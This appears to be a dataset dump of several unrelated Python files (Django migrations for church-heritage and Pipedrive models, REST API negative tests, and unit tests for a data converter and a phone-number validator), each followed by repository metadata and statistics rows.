# Generated by Django 3.1.13 on 2021-08-03 12:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('biserici', '0023_auto_20210731_2005'),
]
operations = [
migrations.AlterModelOptions(
name='biserica',
options={'ordering': ['the_order'], 'verbose_name_plural': ' Biserici'},
),
migrations.AlterModelOptions(
name='componentaartistica',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '3.3 Componenta Artistică'},
),
migrations.AlterModelOptions(
name='conservare',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '5. Stare de conservare'},
),
migrations.AlterModelOptions(
name='descriere',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '3. Descriere'},
),
migrations.AlterModelOptions(
name='finisaj',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '3.2 Finisaje'},
),
migrations.AlterModelOptions(
name='fotografii',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '3.1 Fotografii'},
),
migrations.AlterModelOptions(
name='identificare',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '1. Identificare'},
),
migrations.AlterModelOptions(
name='istoric',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '2. Istoric'},
),
migrations.AlterModelOptions(
name='patrimoniu',
options={'ordering': ['biserica__the_order'], 'verbose_name_plural': '4. Valoare Patrimoniu Cultural'},
),
migrations.AddField(
model_name='historicalidentificare',
name='adresa',
field=models.CharField(blank=True, max_length=250, null=True),
),
migrations.AddField(
model_name='identificare',
name='adresa',
field=models.CharField(blank=True, max_length=250, null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_bolti',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_cimitir',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_corp_biserica',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_elemente_arhitecturale',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_finisaj_peste_corp',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_finisaj_tambur_turn',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_fundatii',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_icoane_istorice',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_invelitoare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_monumente_funerare_valoroase',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_pardoseli_interioare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_picturi_exterioare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_picturi_interioare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_sarpanta_peste_corp_biserica',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_structura_turn',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_teren',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='stare_usi_si_ferestre',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='starea_mobilier',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='starea_obiecte_de_cult',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='conservare',
name='vegetatie_invaziva',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_bolti',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_cimitir',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_corp_biserica',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_elemente_arhitecturale',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_finisaj_peste_corp',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_finisaj_tambur_turn',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_fundatii',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_icoane_istorice',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_invelitoare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_monumente_funerare_valoroase',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_pardoseli_interioare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_picturi_exterioare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_picturi_interioare',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_sarpanta_peste_corp_biserica',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_structura_turn',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_teren',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='stare_usi_si_ferestre',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='starea_mobilier',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='starea_obiecte_de_cult',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
migrations.AlterField(
model_name='historicalconservare',
name='vegetatie_invaziva',
field=models.IntegerField(blank=True, choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5)], null=True),
),
]
| 45.242308
| 115
| 0.545014
| 1,275
| 11,763
| 4.894902
| 0.078431
| 0.060567
| 0.11825
| 0.179458
| 0.88175
| 0.877744
| 0.877744
| 0.877744
| 0.84698
| 0.810928
| 0
| 0.053237
| 0.283006
| 11,763
| 259
| 116
| 45.416988
| 0.686744
| 0.003911
| 0
| 0.893281
| 1
| 0
| 0.184635
| 0.052155
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003953
| 0
| 0.01581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
201627f8073133f5a5b8f15dbf7b50ae06f42345
| 11,093
|
py
|
Python
|
testcases/test_2_create_domain.py
|
evilbrave/REST_API_TESTCASES
|
dccfddf2030adbf8188e0e7bf6dbfa4fa581a420
|
[
"MIT"
] | 1
|
2018-08-07T21:53:52.000Z
|
2018-08-07T21:53:52.000Z
|
testcases/test_2_create_domain.py
|
evilbrave/REST_API_TESTCASES
|
dccfddf2030adbf8188e0e7bf6dbfa4fa581a420
|
[
"MIT"
] | null | null | null |
testcases/test_2_create_domain.py
|
evilbrave/REST_API_TESTCASES
|
dccfddf2030adbf8188e0e7bf6dbfa4fa581a420
|
[
"MIT"
] | 1
|
2019-01-31T13:57:34.000Z
|
2019-01-31T13:57:34.000Z
|
import requests
import common_data
from signature import Signature
import test_1_device_auth
import time
url = common_data.oss_url
#url = "http://127.0.0.1:8888"
path = "/v1/domains"
test_time = time.time()
def init_headers(headers):
headers['Content-Type'] = common_data.content_type
headers['X-Api-Key'] = common_data.x_api_key
headers['X-Signature'] = ""
return headers
def init_body_content(body_content):
body_content['certificate_serial'] = common_data.certificate_serial
body_content['access_token'] = ""
body_content['domain'] = "TEST_DOMAIN_"+str(test_time)
body_content['domain'] = "TEST_DOMAIN"
return body_content
def testcase_0(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 200 :
print "TEST CASE 0 OK"
else:
print "TEST CASE 0 FAILED"
print response.status_code
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_1(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
headers.pop('Content-Type')
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.23":
print "TEST CASE 1 OK!"
else:
print "TEST CASE 1 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_2(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
headers.pop('X-Signature')
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.0":
print "TEST CASE 2 OK!"
else:
print "TEST CASE 2 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_3(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
headers.pop('X-Api-Key')
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 403:# and response.json()['code'] == "400.0":
print "TEST CASE 3 OK!"
else:
print response.status_code
print "TEST CASE 3 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_4(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
body_content.pop('certificate_serial')
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.2":
print "TEST CASE 4 OK!"
else:
print "TEST CASE 4 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_5(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
body_content.pop('access_token')
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.6":
print "TEST CASE 5 OK!"
else:
print "TEST CASE 5 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_6(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
body_content.pop('domain')
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.7":
print "TEST CASE 6 OK!"
else:
print "TEST CASE 6 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_7(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
headers['Content-Type'] = "INVALID_CONTENT_TYPE"
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.19":
print "TEST CASE 7 OK!"
else:
print response.status_code
print "TEST CASE 7 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_8(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
headers['X-Signature'] = "INVALID_X_SIGNATURE"
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.1":
print "TEST CASE 8 OK!"
else:
print response.status_code
print "TEST CASE 8 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_9(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
headers['X-Api-Key'] = "INVALID_X_API_KEY"
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400:# and response.json()['code'] == "400.1":
print "TEST CASE 9 OK!"
else:
print response.status_code
print "TEST CASE 9 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_10(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
body_content['certificate_serial'] = "INVALID_CERTIFICATE_SERIAL"
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.3":
print "TEST CASE 10 OK!"
else:
print response.status_code
print "TEST CASE 10 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_11(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
body_content['access_token'] = "INVALID_ACCESS_TOKEN"
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "401.0":
print "TEST CASE 11 OK!"
else:
print response.status_code
print "TEST CASE 11 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
def testcase_12(headers, body_content):
headers = headers.copy()
body_content = body_content.copy()
body_content['domain'] = "INVALID_DOMAIN!"
concat_text = common_data.get_concat_text(body_content)
signature = Signature()
signature.load_key(common_data.certificate_serial)
signed_signature = signature.sign(concat_text)
headers['X-Signature'] = signed_signature
response = requests.post(url + path, data=body_content, headers=headers)
if response.status_code == 400 and response.json()['code'] == "400.8":
print "TEST CASE 12 OK!"
else:
print response.status_code
print "TEST CASE 12 FAILED!"
print "HTTP Header:" + str(headers)
print "HTTP Body:" + str(body_content)
print response.text
if __name__ == '__main__':
# set headers
headers = dict()
headers = init_headers(headers)
# set body
body_content = dict()
init_body_content(body_content)
sso_tokens = test_1_device_auth.get_device_authentication_token()
if sso_tokens.has_key('access_token') and sso_tokens.has_key('refresh_token'):
body_content['access_token'] = sso_tokens['access_token']
else:
print "[Error] init access token failed!"
exit(-1)
testcase_0(headers, body_content)
# testcase_1(headers, body_content)
# testcase_2(headers, body_content)
# testcase_3(headers, body_content)
# testcase_4(headers, body_content)
# testcase_5(headers, body_content)
# testcase_6(headers, body_content)
# testcase_7(headers, body_content)
# testcase_8(headers, body_content)
# testcase_9(headers, body_content)
# testcase_10(headers, body_content)
# testcase_11(headers, body_content)
# testcase_12(headers, body_content)
#test_create_domain(access_token['access_token'], new_domain)
| 33.113433
| 82
| 0.689444
| 1,421
| 11,093
| 5.148487
| 0.062632
| 0.159377
| 0.063969
| 0.088846
| 0.866184
| 0.781301
| 0.781301
| 0.781301
| 0.781301
| 0.734281
| 0
| 0.018785
| 0.198594
| 11,093
| 335
| 83
| 33.113433
| 0.804162
| 0.054178
| 0
| 0.62249
| 0
| 0
| 0.13327
| 0.002482
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.02008
| null | null | 0.297189
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
203ac4402738cf44045d932de888afb0b0b6964c
| 4,629
|
py
|
Python
|
submissions/converter.tests.py
|
stefantaubert/imageclef-lifelog-2019
|
e779526583978be828ebc096538d094cc3cc260e
|
[
"MIT"
] | 1
|
2020-08-15T01:55:07.000Z
|
2020-08-15T01:55:07.000Z
|
submissions/converter.tests.py
|
stefantaubert/imageclef-lifelog-2019
|
e779526583978be828ebc096538d094cc3cc260e
|
[
"MIT"
] | null | null | null |
submissions/converter.tests.py
|
stefantaubert/imageclef-lifelog-2019
|
e779526583978be828ebc096538d094cc3cc260e
|
[
"MIT"
] | null | null | null |
import unittest
from submissions.runs.converter import subm_to_df
class UnitTests(unittest.TestCase):
def test_subm_to_df_has_headers(self):
csv = subm_to_df({ })
self.assertEqual("topic_id", csv.columns[0])
self.assertEqual("image_id", csv.columns[1])
self.assertEqual("confidence_score", csv.columns[2])
def test_subm_to_df_empty(self):
csv = subm_to_df({ })
self.assertEqual(0, len(csv.index))
def test_subm_to_df_normal(self):
to_conv = {
1: {
'u1_20180528_1816_i00': 1.0,
'u1_20180508_1106_i00': 0.6,
},
2: {
'u1_20180528_1819_i00': 1.0,
'u1_20180508_1106_i01': 0.8,
},
3: {
'u1_20180514_1117_i07': 0.46,
'u1_20180508_1119_i02': 0.31,
},
}
csv = subm_to_df(to_conv)
self.assertEqual(6, len(csv.index))
self.assertEqual([1, 'u1_20180528_1816_i00', 1.0], list(csv.iloc[0]))
self.assertEqual([1, 'u1_20180508_1106_i00', 0.6], list(csv.iloc[1]))
self.assertEqual([2, 'u1_20180528_1819_i00', 1.0], list(csv.iloc[2]))
self.assertEqual([2, 'u1_20180508_1106_i01', 0.8], list(csv.iloc[3]))
self.assertEqual([3, 'u1_20180514_1117_i07', 0.46], list(csv.iloc[4]))
self.assertEqual([3, 'u1_20180508_1119_i02', 0.31], list(csv.iloc[5]))
def test_subm_to_df_ignore_empty(self):
to_conv = {
1: {
'u1_20180528_1816_i00': 1.0,
'u1_20180508_1106_i00': 0.6,
},
2: {
'u1_20180528_1819_i00': 1.0,
'u1_20180508_1106_i01': 0.8,
},
3: {
'u1_20180514_1117_i07': 0.46,
'u1_20180508_1119_i02': 0.31,
},
4: { },
5: { }
}
csv = subm_to_df(to_conv)
self.assertEqual(6, len(csv.index))
self.assertEqual([1, 'u1_20180528_1816_i00', 1.0], list(csv.iloc[0]))
self.assertEqual([1, 'u1_20180508_1106_i00', 0.6], list(csv.iloc[1]))
self.assertEqual([2, 'u1_20180528_1819_i00', 1.0], list(csv.iloc[2]))
self.assertEqual([2, 'u1_20180508_1106_i01', 0.8], list(csv.iloc[3]))
self.assertEqual([3, 'u1_20180514_1117_i07', 0.46], list(csv.iloc[4]))
self.assertEqual([3, 'u1_20180508_1119_i02', 0.31], list(csv.iloc[5]))
def test_subm_to_df_unsorted_scores_are_kept(self):
to_conv = {
1: {
'u1_20180508_1106_i00': 0.6,
'u1_20180528_1816_i00': 1.0,
},
2: {
'u1_20180508_1106_i01': 0.8,
'u1_20180528_1819_i00': 1.0,
},
3: {
'u1_20180508_1119_i02': 0.31,
'u1_20180514_1117_i07': 0.46,
},
}
csv = subm_to_df(to_conv)
self.assertEqual(6, len(csv.index))
self.assertEqual([1, 'u1_20180508_1106_i00', 0.6], list(csv.iloc[0]))
self.assertEqual([1, 'u1_20180528_1816_i00', 1.0], list(csv.iloc[1]))
self.assertEqual([2, 'u1_20180508_1106_i01', 0.8], list(csv.iloc[2]))
self.assertEqual([2, 'u1_20180528_1819_i00', 1.0], list(csv.iloc[3]))
self.assertEqual([3, 'u1_20180508_1119_i02', 0.31], list(csv.iloc[4]))
self.assertEqual([3, 'u1_20180514_1117_i07', 0.46], list(csv.iloc[5]))
def test_subm_to_df_keys_are_sorted(self):
to_conv = {
1: {
'u1_20180508_1106_i00': 0.6,
'u1_20180528_1816_i00': 1.0,
},
3: {
'u1_20180508_1119_i02': 0.31,
'u1_20180514_1117_i07': 0.46,
},
2: {
'u1_20180508_1106_i01': 0.8,
'u1_20180528_1819_i00': 1.0,
},
}
csv = subm_to_df(to_conv)
self.assertEqual(6, len(csv.index))
self.assertEqual([1, 'u1_20180508_1106_i00', 0.6], list(csv.iloc[0]))
self.assertEqual([1, 'u1_20180528_1816_i00', 1.0], list(csv.iloc[1]))
self.assertEqual([2, 'u1_20180508_1106_i01', 0.8], list(csv.iloc[2]))
self.assertEqual([2, 'u1_20180528_1819_i00', 1.0], list(csv.iloc[3]))
self.assertEqual([3, 'u1_20180508_1119_i02', 0.31], list(csv.iloc[4]))
self.assertEqual([3, 'u1_20180514_1117_i07', 0.46], list(csv.iloc[5]))
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(UnitTests)
unittest.TextTestRunner(verbosity=2).run(suite)
| 36.448819
| 78
| 0.550227
| 638
| 4,629
| 3.666144
| 0.111285
| 0.205216
| 0.112869
| 0.058145
| 0.845661
| 0.826422
| 0.826422
| 0.80077
| 0.80077
| 0.794357
| 0
| 0.278274
| 0.298985
| 4,629
| 127
| 79
| 36.448819
| 0.442527
| 0
| 0
| 0.685185
| 0
| 0
| 0.215983
| 0
| 0
| 0
| 0
| 0
| 0.296296
| 1
| 0.055556
| false
| 0
| 0.018519
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
64b4e1931412f2bd80b1d69ceed651e7593adb96
| 1,435
|
py
|
Python
|
tests/test_checkPhoneNumber.py
|
clara0/learn-python
|
ab6d6f3503314ae01442a777c453a383aafdd190
|
[
"Apache-2.0"
] | null | null | null |
tests/test_checkPhoneNumber.py
|
clara0/learn-python
|
ab6d6f3503314ae01442a777c453a383aafdd190
|
[
"Apache-2.0"
] | 6
|
2020-08-08T16:58:01.000Z
|
2020-09-03T02:01:45.000Z
|
tests/test_checkPhoneNumber.py
|
clara0/learn-python
|
ab6d6f3503314ae01442a777c453a383aafdd190
|
[
"Apache-2.0"
] | 1
|
2020-07-24T20:29:41.000Z
|
2020-07-24T20:29:41.000Z
|
from unittest import TestCase
import check_phone_number
class TestCheckPhoneNumber(TestCase):
def test_checkPhoneNum(self):
self.assertTrue(check_phone_number.checkPhoneNum('555-555-5555'))
self.assertTrue(check_phone_number.checkPhoneNum('(555)555-5555'))
self.assertTrue(check_phone_number.checkPhoneNum('(555) 555-5555'))
self.assertTrue(check_phone_number.checkPhoneNum('555 555 5555'))
self.assertTrue(check_phone_number.checkPhoneNum('5555555555'))
self.assertTrue(check_phone_number.checkPhoneNum('1 555-555-5555'))
self.assertTrue(check_phone_number.checkPhoneNum('1(555) 555-5555'))
self.assertTrue(check_phone_number.checkPhoneNum('1(555)555-5555'))
self.assertTrue(check_phone_number.checkPhoneNum('1(555) 555 5555'))
self.assertTrue(check_phone_number.checkPhoneNum('1 552 235 5490'))
self.assertFalse(check_phone_number.checkPhoneNum('2(555) 555 5555'))
self.assertFalse(check_phone_number.checkPhoneNum('1jjj 555 5555'))
self.assertFalse(check_phone_number.checkPhoneNum('1 234234 555 5555'))
self.assertFalse(check_phone_number.checkPhoneNum('2( 555 5555'))
self.assertFalse(check_phone_number.checkPhoneNum('2555) 555 5555'))
self.assertFalse(check_phone_number.checkPhoneNum('(1 (555 555 5555)'))
self.assertFalse(check_phone_number.checkPhoneNum('(1 (555 dddddd55 5555)'))
| 59.791667
| 86
| 0.743554
| 175
| 1,435
| 5.885714
| 0.154286
| 0.174757
| 0.279612
| 0.478641
| 0.853398
| 0.853398
| 0.853398
| 0.853398
| 0.709709
| 0.606796
| 0
| 0.143897
| 0.137979
| 1,435
| 23
| 87
| 62.391304
| 0.688763
| 0
| 0
| 0.285714
| 0
| 0
| 0.170035
| 0
| 0
| 0
| 0
| 0
| 0.809524
| 1
| 0.047619
| false
| 0
| 0.095238
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b3a083e3392093ee4cb9507a16956496b07863c2
| 2,408
|
py
|
Python
|
pipedrive/migrations/0002_auto_20170423_2217.py
|
MasAval/django_pipedrive
|
b5b4df63f2585231dbd710779e242fe3a4e12dc7
|
[
"BSD-3-Clause"
] | 5
|
2017-04-28T19:00:35.000Z
|
2021-02-23T19:49:14.000Z
|
pipedrive/migrations/0002_auto_20170423_2217.py
|
sulsseo/django_pipedrive
|
3c55ba99dd23bdc7638caf8bc94c17a6b675de43
|
[
"BSD-3-Clause"
] | 21
|
2017-05-01T04:11:55.000Z
|
2021-06-10T18:10:10.000Z
|
pipedrive/migrations/0002_auto_20170423_2217.py
|
MasAval/django_pipedrive
|
b5b4df63f2585231dbd710779e242fe3a4e12dc7
|
[
"BSD-3-Clause"
] | 5
|
2017-09-04T02:35:56.000Z
|
2021-05-06T09:09:46.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.contrib.postgres.fields.hstore
class Migration(migrations.Migration):
dependencies = [
('pipedrive', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='activity',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='deal',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='dealfield',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='note',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='organization',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='organizationfield',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='person',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='personfield',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='pipeline',
name='additional_fields',
field=django.contrib.postgres.fields.hstore.HStoreField(null=True),
),
migrations.AddField(
model_name='stage',
name='additional_fields',
